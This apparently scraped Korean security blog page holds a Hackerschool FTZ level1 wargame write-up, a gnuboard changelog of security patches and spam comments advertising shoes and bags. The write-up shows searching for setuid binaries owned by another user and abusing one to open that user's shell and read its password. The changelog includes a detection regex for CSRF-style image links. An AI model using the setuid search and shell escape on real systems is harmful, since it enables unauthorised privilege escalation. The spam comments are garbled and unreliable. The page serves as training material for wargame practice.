Blog | Tag | Local | Media | Guest | Login  RSS
Hackerschool FTZ level1
Category : System hacking

id : level1
pw : level1

Summary : Excute shell

서버에 접속하여 디렉토리에 있는 파일들을 확인해보면 hint라는 파일을 볼 수 있다.

[level1@ftz level1]$ ls -l
합계 12
-rw-r--r--    1 root     root           47  4월  4  2000 hint
drwxr-xr-x    2 root     level1       4096 12월  7  2003 public_html
drwxrwxr-x    2 root     level1       4096  7월 10 13:08 tmp

hint를 읽어본다.

[level1@ftz level1]$ cat hint

level2 권한에 setuid가 걸린 파일을 찾는다.


level2 user에 setuid가 걸려있으므로 권한은 최소한 4000이상이어야 한다.
파일이 어디에있는지 모르므로 루트디렉토리( / )에서부터 찾아야한다.
이 조건을 토대로 find 명령어를 이용해 파일을 검색한다.

[level1@ftz level1]$ find / -user level2 -perm -4000 2> /dev/null
[level1@ftz level1]$ ls -l /bin/ExcuteMe
-rwsr-sr-x    1 level2   level1      23625  3월 29  2003 /bin/ExcuteMe

/bin/ExcuteMe를 찾았다. 실행권한이 있으므로 실행시켜본다.

[level1@ftz level1]$ ExcuteMe


  레벨2의 권한으로 당신이 원하는 명령어를
  한가지 실행시켜 드리겠습니다.
  (단, my-pass 와 chmod는 제외)

  어떤 명령을 실행시키겠습니까?

  [level2@ftz level2]$ id

uid=3002(level2) gid=3001(level1) groups=3001(level1)

level2의 권한으로 입력받은 명령을 실행시켜주는 프로그램이다.
다시 실행시켜 /bin/sh 를 입력해본다.

 [level1@ftz level1]$ ExcuteMe


  레벨2의 권한으로 당신이 원하는 명령어를
  한가지 실행시켜 드리겠습니다.
  (단, my-pass 와 chmod는 제외)

  어떤 명령을 실행시키겠습니까?

  [level2@ftz level2]$ /bin/sh

sh-2.05b$ id
uid=3002(level2) gid=3001(level1) groups=3001(level1)
sh-2.05b$ my-pass

Level2 Password is "hacker or cracker".

level2 권한의 쉘을 획득하고 level2의 password를 얻었다.

'Wargame > FTZ' 카테고리의 다른 글

Hackerschool FTZ level6  (1) 2011.07.17
Hackerschool FTZ level5  (1) 2011.07.17
Hackerschool FTZ level4  (0) 2011.07.17
Hackerschool FTZ level3  (0) 2011.07.17
Hackerschool FTZ level2  (0) 2011.07.17
Hackerschool FTZ level1  (0) 2011.05.29

비밀글 (Secret)



4.34.03 (11.05.17) 
     :  [보안패치] SQL Injection 취약점에 대비한 코드 수정 
        (한국인터넷진흥원을 통하여 과천고등학교 권혁님께서 취약점과 해결방안을 자세하게 알려주셨습니다.) 
     :  [보안패치] 이미지 태그의 src 속성에 download.php 링크가 있는 경우 게시물을 확인하는 것만으로도 파일의 다운로드가 가능한 취약점 수정 
        (국제정보보안센터[i2Sec]의 최종훈님께서 알려주셨습니다.) 

[+] lib/common.lib.php 의 get_sql_search() 함수에 추가 

            $field[$k] = preg_match("/^[\w\,\|]+$/", $field[$k]) ? $field[$k] : "wr_subject"; 

[+] lib/common.lib.php 의 conv_content() 함수 추가 

           $content = preg_replace("/<(img[^>]+download\.php[^>]+bo_table[^>]+)/i", "*** CSRF 감지 : &lt;$1", $content);


'Research > Vulnerability' 카테고리의 다른 글

gnuboard 4.33.00 SQL injection vulnerability  (7) 2011.05.29

 태그 : 
luyv| 2011.08.13 23:37 신고 | PERMALINK | EDIT/DEL | REPLY
오오 쩐다 ㅋㅋ 취약점 발견하다니 ㅋㅋ
pwn3r | 2011.08.20 00:02 신고 | PERMALINK | EDIT/DEL
아 운이었음 ㅋㅋㅋ
valentino bow pumps| 2014.03.14 07:10 신고 | PERMALINK | EDIT/DEL | REPLY
는있But why take the time

I went over to express to my wife. She was in the wedding ceremony planning section getting reference books for my daughter and there was even a "wedding and reception planning for DUMMIES " Book certainly there. As I walked within the perimeter of bookstore I couldn't believe how many "idiot's" Titles were in local store,isabel marant ankle boots.

If the finish detail고던
isabel marant| 2014.03.14 07:12 신고 | PERMALINK | EDIT/DEL | REPLY
있려We are up for just anything,Chanel

Other exceptions are prescription drugs or over the counter medications such as eye drops or saline solutions. If you have a disability or medical condition that requires you to have water, drink, Gels or liquid nutrition you may carry include those with you as well. Any life support or life protecting liquids can be carried in larger containers as well.

isabel marant sale| 2014.03.14 07:14 신고 | PERMALINK | EDIT/DEL | REPLY
리어there will be bean bags that are used as juggling balls

These environmentallyconscious bags make excellent giveaways at trade events, Gifts during staff development,prescription oakley sunglasses, Or grand opening sales. People love to use the bags for a ton of purposes and everywhere they go, an additional name is prominently displayed. next occasion they shop with recycled grocery bags or sho비있
christian louboutin sale| 2014.03.24 22:50 신고 | PERMALINK | EDIT/DEL | REPLY
관에Under family and divorce laws

I believe I appreciate the plan of the Merino Sleep Bag more in the mornings than any other time. The reason being is when we need to get out in the cold mornings to take my oldest to school, Luke can be listed and put directly in his car seat with his sleep bag on. It has a special area that the car seat strap undergoes.

That's about a lot more irritated. Some을던
isabel marant zappos| 2014.03.24 22:58 신고 | PERMALINK | EDIT/DEL | REPLY
지관Seems out of the value question right now

I still remember how she encouraged and consoled me just when I was checked by neck bottle in professional career. I don't think I can own all the things I have now without her support. My wife once used to be a capable working woman, But she resolutely gave up her career after getting married to me.

Since scooter luggage has very important function로우
비밀글 (Secret)
블로그 오픈 ~
Name : Kwon hyuk
Twitter : @pwn3r_
Email :


'ETC' 카테고리의 다른 글

apache2 CGI 활성화 시키기  (323) 2013.05.07
Linux에 firmware-mod-kit 설치  (2) 2012.10.28
Linux에 binwalk 설치  (0) 2012.10.28
Linux에 Python Image Library(PIL) 설치  (0) 2012.10.11
블로그 오픈 ~  (0) 2011.05.29

비밀글 (Secret)

티스토리 툴바